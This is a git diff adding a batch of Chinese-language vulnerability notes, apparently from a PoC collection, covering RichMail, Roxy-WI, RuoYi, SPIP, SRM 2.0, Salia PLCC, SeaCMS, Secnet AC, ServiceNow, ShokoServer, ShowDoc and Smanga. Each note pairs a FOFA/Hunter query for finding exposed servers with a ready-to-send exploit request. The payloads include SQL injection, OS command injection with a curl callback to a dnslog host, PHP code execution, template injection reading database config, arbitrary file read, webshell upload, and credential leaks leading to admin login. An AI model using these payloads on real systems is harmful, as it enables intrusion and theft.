+> 更新: 2024-06-17 09:34:03  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ksyz94lfputxy1uv>
\ No newline at end of file
diff --git a/RichMail企业邮箱敏感信息泄漏漏洞.md b/RichMail企业邮箱敏感信息泄漏漏洞.md
new file mode 100644
index 0000000..b5f5991
--- /dev/null
+++ b/RichMail企业邮箱敏感信息泄漏漏洞.md
@@ -0,0 +1,47 @@
+# RichMail 企业邮箱敏感信息泄漏漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(0, 0, 0);">  Richmail是亚太本土最大的电子邮件系统提供商之一，是新一代智慧企业云邮件系统，以安全、稳定、高效著称。Richmail作为投资千万，自主研发的邮件系统，获得了多项发明专利，凭借移动化、套件化、能力开放及服务计量等等核心技术，持续引领全球邮箱领域的发展方向，每天数以亿计的智慧和信息在Richmail汇聚、碰撞、传递。RichMail某版本存在信息泄漏漏洞，未经授权的攻击者可以利用此漏洞获取企业邮箱的账号密码信息，登陆管理后台。</font>
+
+# <font style="color:rgb(0, 0, 0);">二、影响版本</font>
++ RichMail 企业邮箱
+
+# 三、资产测绘
++ fofa`app="Richmail-企业邮箱"`
++ 特征
+
+![1698649024138-ac0b79ce-40c0-4dcd-a7e8-6e25b26e5202.png](./img/JPHu9Cvqk-3yYyGV/1698649024138-ac0b79ce-40c0-4dcd-a7e8-6e25b26e5202-025912.png)
+
+# 四、漏洞复现
+按需调整`X-Forwarded-For: 127.0.0.1`
+
+```plain
+GET /RmWeb/noCookiesMail?func=user:getPassword&userMailName=admin HTTP/1.1
+Host: xx.xx.xx.xx
+Cookie: lang=zh_CN
+X-Forwarded-For: 127.0.0.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+Te: trailers
+Connection: close
+```
+
+![1698649060171-6bcea3b8-efd4-4a42-bd6b-bb9f6f17cff0.png](./img/JPHu9Cvqk-3yYyGV/1698649060171-6bcea3b8-efd4-4a42-bd6b-bb9f6f17cff0-811517.png)
+
+获取管理员MD5加密值后抓去登陆数据包替换即可进入后台
+
+![1698649267168-8c5ddd8b-5070-4841-9109-627032ea6d62.png](./img/JPHu9Cvqk-3yYyGV/1698649267168-8c5ddd8b-5070-4841-9109-627032ea6d62-103965.png)
+
+![1698649300470-de7ba283-6de1-4d76-91f7-f3254744b023.png](./img/JPHu9Cvqk-3yYyGV/1698649300470-de7ba283-6de1-4d76-91f7-f3254744b023-812193.png)
+
+
+
+> 更新: 2024-02-29 23:57:46  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/nngn0owe1cvrrahv>
\ No newline at end of file
diff --git a/Roxy-WIoptions.py远程命令执行漏洞.md b/Roxy-WIoptions.py远程命令执行漏洞.md
new file mode 100644
index 0000000..4d444a8
--- /dev/null
+++ b/Roxy-WIoptions.py远程命令执行漏洞.md
@@ -0,0 +1,41 @@
+# Roxy-WI options.py远程命令执行漏洞
+
+# 一、漏洞简介
+`Roxy-WI`是开源的一款用于管理`Haproxy`、`Nginx`和`Keepalive`服务器的`Web`界面。`Roxy-WI 6.1.1.0`之前版本`options.py`接口存在远程命令执行漏洞，攻击者可以执行命令获取服务器权限。
+
+# 二、影响版本
++ Roxy-WI 6.1.1.0之前
+
+# 三、资产测绘
++ hunter`app.name="Roxy-WI"`
++ 登录页面
+
+![1693667442839-660cc767-28ad-4aad-bd3b-4d9c2e14d7be.png](./img/iCSSjRE_IUgiPq-B/1693667442839-660cc767-28ad-4aad-bd3b-4d9c2e14d7be-859787.png)
+
+# 四、漏洞复现
+```java
+POST /app/options.py HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+Te: trailers
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 82
+
+alert_consumer=1&serv=127.0.0.1&ipbackend=%22%3Bid+%23%23&backend_server=127.0.0.1
+```
+
+![1693667552294-597d9ca3-20e3-4250-b873-5f3200e3583d.png](./img/iCSSjRE_IUgiPq-B/1693667552294-597d9ca3-20e3-4250-b873-5f3200e3583d-511689.png)
+
+
+
+> 更新: 2024-02-29 23:57:33  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rhpr1hfx80b04z1f>
\ No newline at end of file
diff --git a/RuoYi4.6.0-SQL注入漏洞CVE-2023-49371.md b/RuoYi4.6.0-SQL注入漏洞CVE-2023-49371.md
new file mode 100644
index 0000000..08e61de
--- /dev/null
+++ b/RuoYi4.6.0-SQL注入漏洞CVE-2023-49371.md
@@ -0,0 +1,11 @@
+## RuoYi4.6.0 SQL注入漏洞CVE-2023-49371
+
+若依在4.6版本之前存在SQL注入漏洞，攻击者通过该漏洞可以进行SQL注入利用，从而获取数据库中的敏感信息
+
+## poc
+```
+DeptName=1&deptid =100&ParentId=12&Status= 0&ordernum =1&ancestors=0)or(extractvalue(1,concat((select user())))); #
+```
+![image](https://github.com/wy876/POC/assets/139549762/7c110048-af68-42e5-ba3b-ffb69bb28f17)
+
+![image](https://github.com/wy876/POC/assets/139549762/653098c3-5c6d-45a9-b50a-850b48475662)
diff --git a/SPIP-porte_plume插件存在任意PHP执行漏洞(CVE-2024-7954).md b/SPIP-porte_plume插件存在任意PHP执行漏洞(CVE-2024-7954).md
new file mode 100644
index 0000000..c2ce9c3
--- /dev/null
+++ b/SPIP-porte_plume插件存在任意PHP执行漏洞(CVE-2024-7954).md
@@ -0,0 +1,22 @@
+# SPIP-porte_plume插件存在任意PHP执行漏洞(CVE-2024-7954)
+
+SPIP使用的porte_plume插件存在任意代码执行漏洞。未经身份验证的远程攻击者可以通过发送精心设计的 HTTP 请求以 SPIP 用户身份执行任意 PHP。
+
+## fofa
+
+```java
+icon_hash=="-1224668706"
+```
+
+## poc
+
+```java
+POST /index.php?action=porte_plume_previsu HTTP/1.1
+Host: 127.0.0.1
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
+
+data=AA_%5B%3Cimg111111%3E-%3EURL%60%3C%3Fphp+system%28%22whoami%22%29%3B%3F%3E%60%5D_BB
+```
+
diff --git a/SPIP插件porte_plume存在任意PHP执行漏洞(CVE-2024-7954).md b/SPIP插件porte_plume存在任意PHP执行漏洞(CVE-2024-7954).md
new file mode 100644
index 0000000..403dd31
--- /dev/null
+++ b/SPIP插件porte_plume存在任意PHP执行漏洞(CVE-2024-7954).md
@@ -0,0 +1,31 @@
+# SPIP插件porte_plume存在任意PHP执行漏洞(CVE-2024-7954)
+
+# 一、漏洞简介
+SPIP 4.30-alpha2、4.2.13、4.1.16之前的版本使用的porte_plume插件存在任意代码执行漏洞，远程未经身份验证的攻击者可以通过发送精心设计的HTTP 请求以SPIP用户身份执行任意PHP代码。
+
+# 二、影响版本
+SPIP插件porte_plume
+
+# 三、资产测绘
++ fofa`icon_hash=="-1224668706"`
++ 特征
+
+![1725074957647-c35def1f-98a2-4638-8491-08b2d4d9feef.png](./img/MgI_aUY7wIBqRyz7/1725074957647-c35def1f-98a2-4638-8491-08b2d4d9feef-386188.png)
+
+# 四、漏洞复现
+```java
+POST /index.php?action=porte_plume_previsu HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 0
+
+data=AA_[<img111111>->URL`<?php system("id");?>`]_BB
+```
+
+![1724987402306-140c705e-9e86-409c-a1d9-55ba7910f820.png](./img/MgI_aUY7wIBqRyz7/1724987402306-140c705e-9e86-409c-a1d9-55ba7910f820-580953.png)
+
+
+
+> 更新: 2024-09-05 23:21:35  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gzh7mvbhub0l35ct>
\ No newline at end of file
diff --git a/SRM智联云采系统getSuppliers存在SQL注入漏洞.md b/SRM智联云采系统getSuppliers存在SQL注入漏洞.md
new file mode 100644
index 0000000..3e3db87
--- /dev/null
+++ b/SRM智联云采系统getSuppliers存在SQL注入漏洞.md
@@ -0,0 +1,20 @@
+# SRM智联云采系统getSuppliers存在SQL注入漏洞
+智互联(深圳)科技有限公司SRM智联云采系统针对企业供应链管理难题，及智能化转型升级需求，智联云采依托人工智能、物联网、大数据、云等技术，通过软硬件系统化方案，帮助企业实现供应商关系管理和采购线上化、移动化、智能化，提升采购和协同效率，进而规避供需风险，强化供应链整合能力，构建企业利益共同体。智互联(深圳)科技有限公司SRM智联云采系统getSuppliers存在SQL注入漏洞。
+
+## fofa
+```javascript
+title=="SRM 2.0"
+```
+
+## poc
+```java
+POST /adpweb/static/%2e%2e;/a/srm/inquiry/getSuppliers?code=%27+AND+%28SELECT+1312+FROM+%28SELECT%28SLEEP%283%29%29%29HckV%29--+HyuV HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Connection: keep-alive
+```
+
+![image-20241122151303974](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411221513048.png)
diff --git a/SRM智联云采系统inquiry存在SQL注入漏洞.md b/SRM智联云采系统inquiry存在SQL注入漏洞.md
new file mode 100644
index 0000000..6872a5e
--- /dev/null
+++ b/SRM智联云采系统inquiry存在SQL注入漏洞.md
@@ -0,0 +1,21 @@
+# SRM智联云采系统inquiry存在SQL注入漏洞
+智互联(深圳)科技有限公司SRM智联云采系统针对企业供应链管理难题，及智能化转型升级需求，智联云采依托人工智能、物联网、大数据、云等技术，通过软硬件系统化方案，帮助企业实现供应商关系管理和采购线上化、移动化、智能化，提升采购和协同效率，进而规避供需风险，强化供应链整合能力，构建企业利益共同体。智互联(深圳)科技有限公司SRM智联云采系统inquiry存在SQL注入漏洞。
+
+## fofa
+```
+title=="SRM 2.0"
+```
+
+## poc
+```java
+GET /adpweb/static/%2e%2e;/a/srm/inquiry/getSuppliers?code=1%27+AND+GTID_SUBSET%28CONCAT%280x7e%2C%28SELECT+md5%281234%29%29%2C0x7e%29%2C7973%29--+WkOF&name=1 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.9
+X-Requested-With: XMLHttpRequest
+Accept-Encoding: gzip
+```
+
+![image-20241120093233440](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411200932557.png)
+
diff --git a/SRM智联云采系统quickReceiptDetail存在SQL注入漏洞.md b/SRM智联云采系统quickReceiptDetail存在SQL注入漏洞.md
new file mode 100644
index 0000000..0641262
--- /dev/null
+++ b/SRM智联云采系统quickReceiptDetail存在SQL注入漏洞.md
@@ -0,0 +1,21 @@
+# SRM智联云采系统quickReceiptDetail存在SQL注入漏洞
+智互联(深圳)科技有限公司SRM智联云采系统针对企业供应链管理难题，及智能化转型升级需求，智联云采依托人工智能、物联网、大数据、云等技术，通过软硬件系统化方案，帮助企业实现供应商关系管理和采购线上化、移动化、智能化，提升采购和协同效率，进而规避供需风险，强化供应链整合能力，构建企业利益共同体。智互联(深圳)科技有限公司SRM智联云采系统quickReceiptDetail存在SQL注入漏洞。
+
+## fofa
+```javascript
+title=="SRM 2.0"
+```
+
+## poc
+```java
+POST /adpweb/api/srm/delivery/quickReceiptDetail?orderBy=%28UPDATEXML%288058%2CCONCAT%280x2e%2C0x71707a7671%2C%28SELECT+%28ELT%288058%3D8058%2C1%29%29%29%2C0x71766a7671%29%2C3521%29%29 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Connection: keep-alive
+```
+
+![image-20241122151037735](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411221510814.png)
+
diff --git a/SRM智联云采系统receiptDetail存在SQL注入漏洞.md b/SRM智联云采系统receiptDetail存在SQL注入漏洞.md
new file mode 100644
index 0000000..aea4f6f
--- /dev/null
+++ b/SRM智联云采系统receiptDetail存在SQL注入漏洞.md
@@ -0,0 +1,20 @@
+# SRM智联云采系统receiptDetail存在SQL注入漏洞
+智互联(深圳)科技有限公司SRM智联云采系统针对企业供应链管理难题，及智能化转型升级需求，智联云采依托人工智能、物联网、大数据、云等技术，通过软硬件系统化方案，帮助企业实现供应商关系管理和采购线上化、移动化、智能化，提升采购和协同效率，进而规避供需风险，强化供应链整合能力，构建企业利益共同体。智互联(深圳)科技有限公司SRM智联云采系统receiptDetail存在SQL注入漏洞。
+
+## fofa
+```javascript
+title=="SRM 2.0"
+```
+
+## poc
+```java
+POST /adpweb/api/srm/delivery/receiptDetail?orderBy=%28UPDATEXML%288058%2CCONCAT%280x2e%2C0x71707a7671%2C%28SELECT+%28ELT%288058%3D8058%2C1%29%29%29%2C0x71766a7671%29%2C3521%29%29 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Connection: keep-alive
+```
+
+![image-20241122151334246](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411221513324.png)
diff --git a/SRM智联云采系统statusList存在SQL注入漏洞.md b/SRM智联云采系统statusList存在SQL注入漏洞.md
new file mode 100644
index 0000000..a5247cc
--- /dev/null
+++ b/SRM智联云采系统statusList存在SQL注入漏洞.md
@@ -0,0 +1,21 @@
+# SRM智联云采系统statusList存在SQL注入漏洞
+智互联(深圳)科技有限公司SRM智联云采系统针对企业供应链管理难题，及智能化转型升级需求，智联云采依托人工智能、物联网、大数据、云等技术，通过软硬件系统化方案，帮助企业实现供应商关系管理和采购线上化、移动化、智能化，提升采购和协同效率，进而规避供需风险，强化供应链整合能力，构建企业利益共同体。智互联(深圳)科技有限公司SRM智联云采系统statusList存在SQL注入漏洞。
+
+## fofa
+```javascript
+title=="SRM 2.0"
+```
+
+## poc
+```java
+POST /adpweb/static/..;/a/sys/sysMessage/statusList?companyName=1&officeName=1&orderBy=1&receiverName=1&sourceMessageId=1&delStatus=1%20AND%20(SELECT%207104%20FROM%20(SELECT(SLEEP(3)))xZoa) HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Connection: keep-alive
+```
+
+![image-20241122151355129](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411221513193.png)
+
diff --git a/Salia-PLCC-cPH2-远程命令执行漏洞(CVE-2023-46359).md b/Salia-PLCC-cPH2-远程命令执行漏洞(CVE-2023-46359).md
new file mode 100644
index 0000000..ccf634c
--- /dev/null
+++ b/Salia-PLCC-cPH2-远程命令执行漏洞(CVE-2023-46359).md
@@ -0,0 +1,68 @@
+# Salia PLCC cPH2 远程命令执行漏洞(CVE-2023-46359)
+
+## fofa
+```
+"Salia PLCC"
+```
+
+![](./assets/20231226203214.png)
+
+## poc
+```
+/connectioncheck.php?ip=127.0.0.1%20&&%20curl%20http://dnslog.cn
+
+/connectioncheck.php?ip=127.0.0.1%20&&%20${curl%209qa1r0.dnslog.cn}
+```
+
+![](./assets/20231226203501.png)
+
+![](./assets/20231226203521.png)
+
+
+## yaml poc
+```
+id: CVE-2023-46359
+
+info:
+  name: cPH2 Charging Station v1.87.0 - OS Command Injection
+  author: mlec
+  severity: critical
+  description: |
+    An OS command injection vulnerability in Hardy Barth cPH2 Ladestation v1.87.0 and earlier, may allow an unauthenticated remote attacker to execute arbitrary commands on the system via a specifically crafted arguments passed to the connectivity check feature.
+  remediation: Fixed in version 2.0.0
+  reference:
+    - https://www.offensity.com/en/blog/os-command-injection-in-cph2-charging-station-200-cve-2023-46359-and-cve-2023-46360/
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-46359
+  classification:
+    cvss-metrics: CVSS:3.1/AV:A/AC:N/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 9.6
+    cve-id: CVE-2023-46359
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: html:"Salia PLCC"
+  tags: cve,cve2023,salia-plcc,cph2,rce
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/connectioncheck.php?ip={{url_encode('127.0.0.1 && curl http://$(whoami).{{interactsh-url}}')}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<b>SUCCESS</b>"
+          - "127.0.0.1 && curl http://$(whoami).{{interactsh-url}}"
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+# digest: 4a0a00473045022068ef983fa81262636ea41ef1e73a41004e64f96e9a0bf31555de76a92984a911022100851ff91914ba0856c3e59c01d679b4f5076ed7f404cb50efe363eb43f19ec7b3:922c64590222798bb761d5b6d8e72950
+```
diff --git a/SeaCMS海洋影视管理系统index.php存在SQL注入漏洞.md b/SeaCMS海洋影视管理系统index.php存在SQL注入漏洞.md
new file mode 100644
index 0000000..bf5125b
--- /dev/null
+++ b/SeaCMS海洋影视管理系统index.php存在SQL注入漏洞.md
@@ -0,0 +1,26 @@
+# SeaCMS海洋影视管理系统index.php存在SQL注入漏洞
+
+SeaCMS海洋影视管理系统index.php存在SQL注入漏洞，攻击者可获取数据库敏感数据。
+
+## fofa
+
+```yaml
+app="海洋CMS"
+```
+
+## poc
+
+```java
+POST /js/player/dmplayer/dmku/index.php?ac=edit HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Accept-Ldwk: bG91ZG9uZ3dlbmt1
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 56
+
+cid=(select(1)from(select(sleep(6)))x)&text=1&color=1
+```
+
diff --git a/Secnet安网-智能AC管理系统-actpt_5g-信息泄露.md b/Secnet安网-智能AC管理系统-actpt_5g-信息泄露.md
new file mode 100644
index 0000000..7d1b980
--- /dev/null
+++ b/Secnet安网-智能AC管理系统-actpt_5g-信息泄露.md
@@ -0,0 +1,15 @@
+## Secnet安网 智能AC管理系统 actpt_5g 信息泄露
+
+## fofa
+```
+title="安网-智能路由系统" || header="HTTPD_ac 1.0"
+```
+## poc
+```
+http://xxxxx/actpt_5g.data
+```
+
+![069c247466403f3336550f21bcea0ff4](https://github.com/wy876/POC/assets/139549762/205a328b-f4cf-41a6-8cc0-c8d74db79876)
+
+![e06692e5a2926d80686685b5e8fec3c4](https://github.com/wy876/POC/assets/139549762/9caa2d80-b573-4638-b500-9bd87f642c51)
+
diff --git a/Secnet安网智能AC管理系统actpt_5g信息泄露.md b/Secnet安网智能AC管理系统actpt_5g信息泄露.md
new file mode 100644
index 0000000..3cc00ff
--- /dev/null
+++ b/Secnet安网智能AC管理系统actpt_5g信息泄露.md
@@ -0,0 +1,35 @@
+# Secnet安网 智能AC管理系统 actpt_5g 信息泄露
+
+# 一、漏洞简介
+<font style="color:rgb(51, 51, 51);">Secnet安网 智能AC管理系统 actpt_5g 接口存在信息泄露漏洞，可获取用户密码信息。</font>
+
+# <font style="color:rgb(51, 51, 51);">二、影响版本</font>
++ <font style="color:rgb(51, 51, 51);">Secnet安网 智能AC管理系统 </font>
+
+# <font style="color:rgb(51, 51, 51);">三、资产测绘</font>
++ hunter`web.title="安网-智能路由系统"`
++ 特征
+
+![1702369576891-35aff956-fbea-4f67-b05b-466200f5fcb3.png](./img/QmDYfQBL_bI9V4Jq/1702369576891-35aff956-fbea-4f67-b05b-466200f5fcb3-113410.png)
+
+# 四、漏洞复现
+```plain
+GET /actpt_5g.data HTTP/1.1
+Host: {hostname}
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: ac_userid=admin,ac_passwd=70076EA6CDE654631A639018D9E23BC5
+Upgrade-Insecure-Requests: 1
+```
+
+![1702369649483-f28655d2-e6c6-42f2-adf9-8c9b831c2cfe.png](./img/QmDYfQBL_bI9V4Jq/1702369649483-f28655d2-e6c6-42f2-adf9-8c9b831c2cfe-436141.png)使用泄露的账号密码`admin/admin`登录系统
+
+![1702369681603-6e0bff32-6015-4fee-834e-c17072637574.png](./img/QmDYfQBL_bI9V4Jq/1702369681603-6e0bff32-6015-4fee-834e-c17072637574-749568.png)
+
+
+
+> 更新: 2024-02-29 23:57:12  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gaq5fqcqle5ez69e>
\ No newline at end of file
diff --git a/ServiceNowUIJelly模板注入漏洞(CVE-2024-4879).md b/ServiceNowUIJelly模板注入漏洞(CVE-2024-4879).md
new file mode 100644
index 0000000..4e66e3e
--- /dev/null
+++ b/ServiceNowUIJelly模板注入漏洞(CVE-2024-4879).md
@@ -0,0 +1,29 @@
+# ServiceNowUI Jelly模板注入漏洞(CVE-2024-4879)
+
+# 一、漏洞简介
+ServiceNow UI (用户界面)是ServiceNow平台提供的一种直观、现代化的用户交互方式。它采用响应式设计,能在各种设备上显示良好,并提供直观的导航菜单和面包屑功能,让用户能快速找到所需的功能和信息。同时,ServiceNow UI 支持个性化设置,用户可以自定义UI的外观和布局。针对移动设备,ServiceNow UI也进行了优化,提供了触摸优先的交互方式。总的来说, ServiceNow UI旨在为用户提供一种简单、统一且高效的使用体验,满足他们在ServiceNow平台上的各种需求。其存在CVE-2024-4879 Jelly模板注入漏洞攻击者可通过此漏洞执行代码，读取系统文件内容。
+
+# 二、影响版本
+ServiceNowUI
+
+# 三、资产测绘
+```plain
+icon_hash="1701804003"
+```
+
+![1720973227671-1bceec68-98aa-4ef0-9f45-36b23f5dc3ba.png](./img/eccG_4hJp1WG4yXc/1720973227671-1bceec68-98aa-4ef0-9f45-36b23f5dc3ba-174564.png)
+
+# 四、漏洞复现
+```plain
+GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly:core%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Ez=new%20Packages.java.io.File(%22%22).getAbsolutePath();z=z.substring(0,z.lastIndexOf(%22/%22));u=new%20SecurelyAccess(z.concat(%22/co..nf/glide.db.properties%22)).getBufferedReader();s=%22%22;while((q=u.readLine())!==null)s=s.concat(q,%22%5Cn%22);gs.addErrorMessage(s);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E%22 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+Connection: close
+```
+
+![1720973158902-350dace2-a8d1-4572-9aac-5d7b771fc939.png](./img/eccG_4hJp1WG4yXc/1720973158902-350dace2-a8d1-4572-9aac-5d7b771fc939-610384.png)
+
+
+
+> 更新: 2024-08-12 17:16:00  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pz31klo12bw4m464>
\ No newline at end of file
diff --git a/ShokoServerwithpath存在任意文件读取漏洞.md b/ShokoServerwithpath存在任意文件读取漏洞.md
new file mode 100644
index 0000000..ed2da4d
--- /dev/null
+++ b/ShokoServerwithpath存在任意文件读取漏洞.md
@@ -0,0 +1,31 @@
+# ShokoServer withpath存在任意文件读取漏洞
+
+# 一、漏洞简介
+ Shoko Server 是一个基于 Java 的开源媒体服务器软件，旨在提供一个统一的媒体管理和流媒体解决方案。它支持多种媒体格式，包括视频、音频、图片等，能够对媒体文件进行索引、搜索、播放和流媒体等操作，ShokoServer 接口处存在任意文件读取漏洞，恶意攻击者可能利用该漏洞读取服务器上的敏感文件，例如客户记录、财务数据或源代码，导致数据泄露。 
+
+# 二、影响版本
+ShokoServer 
+
+# 三、资产测绘
+```plain
+title="Shoko WEB UI"
+```
+
+![1718818450198-44a101d0-316c-4d7e-8400-2a31b8d1f59e.png](./img/wxwNT0908SqtJqKO/1718818450198-44a101d0-316c-4d7e-8400-2a31b8d1f59e-667302.png)
+
+# 四、漏洞复现
+```java
+GET /api/Image/withpath/C:\Windows\win.ini HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Content-Length: 0
+```
+
+![1718818490807-dfbfe785-9fb9-4d6b-82ef-ba88038a9dcb.png](./img/wxwNT0908SqtJqKO/1718818490807-dfbfe785-9fb9-4d6b-82ef-ba88038a9dcb-188673.png)
+
+
+
+
+
+> 更新: 2024-06-23 23:42:48  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xf0qp3zhll25buy9>
\ No newline at end of file
diff --git a/ShowDocPageController存在任意文件上传漏洞.md b/ShowDocPageController存在任意文件上传漏洞.md
new file mode 100644
index 0000000..3f06c1a
--- /dev/null
+++ b/ShowDocPageController存在任意文件上传漏洞.md
@@ -0,0 +1,43 @@
+# ShowDoc PageController存在任意文件上传漏洞
+
+# 一、漏洞简介
+ShowDoc是一个非常适合IT团队的在线文档分享工具，它可以加快团队之间沟通的效率。通过showdoc，你可以方便地使用markdown语法来书写出美观的API文档、数据字典文档、技术文档、在线excel文档等等。ShowDoc系统存在任意文件上传漏洞，攻击者可以通过上传恶意文件执行任意命令，获取服务器管理权限。
+
+# 二、影响版本
++ ShowDoc
+
+# 三、资产测绘
++ fofa`app="ShowDoc"`
++ 特征
+
+![1717008909960-98ec294e-2aa1-4ed3-9e3e-77f5ccc28bb4.png](./img/8QZNWZkLqxGKi3s0/1717008909960-98ec294e-2aa1-4ed3-9e3e-77f5ccc28bb4-778686.png)
+
+# 四、漏洞复现
+```rust
+POST /index.php?s=/home/page/uploadImg HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Content-Length: 241
+Content-Type: multipart/form-data; boundary=--------------------------921378126371623762173617
+Accept-Encoding: gzip
+
+----------------------------921378126371623762173617
+Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
+Content-Type: text/plain
+
+<?php phpinfo();?>
+----------------------------921378126371623762173617--
+```
+
+![1717009091618-d86139f0-fa88-44ba-b1b9-816399d8a831.png](./img/8QZNWZkLqxGKi3s0/1717009091618-d86139f0-fa88-44ba-b1b9-816399d8a831-156809.png)
+
+```rust
+http://127.0.0.1:8000/Public/Uploads/2024-05-30/66577ab51bb29.php
+```
+
+![1717009125691-f848e62e-6145-48a3-9008-d7129dd86854.png](./img/8QZNWZkLqxGKi3s0/1717009125691-f848e62e-6145-48a3-9008-d7129dd86854-508808.png)
+
+
+
+> 更新: 2024-06-01 11:14:22  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tw1q4kmr0efcmd8m>
\ No newline at end of file
diff --git a/Smangaget-file-flow存在任意文件读取漏洞.md b/Smangaget-file-flow存在任意文件读取漏洞.md
new file mode 100644
index 0000000..2cc8a24
--- /dev/null
+++ b/Smangaget-file-flow存在任意文件读取漏洞.md
@@ -0,0 +1,38 @@
+# Smanga get-file-flow存在任意文件读取漏洞
+
+# 一、漏洞简介
+Smanga无需配置，docker直装的漫画流媒体阅读工具。以emby plex为灵感，为解决漫画阅读需求而开发的漫画阅读器。Smanga get-file-flow存在任意文件读取漏洞。
+
+# 二、影响版本
++ Smanga
+
+# 三、资产测绘
++ hunter`web.title=="smanga"`
++ 特征
+
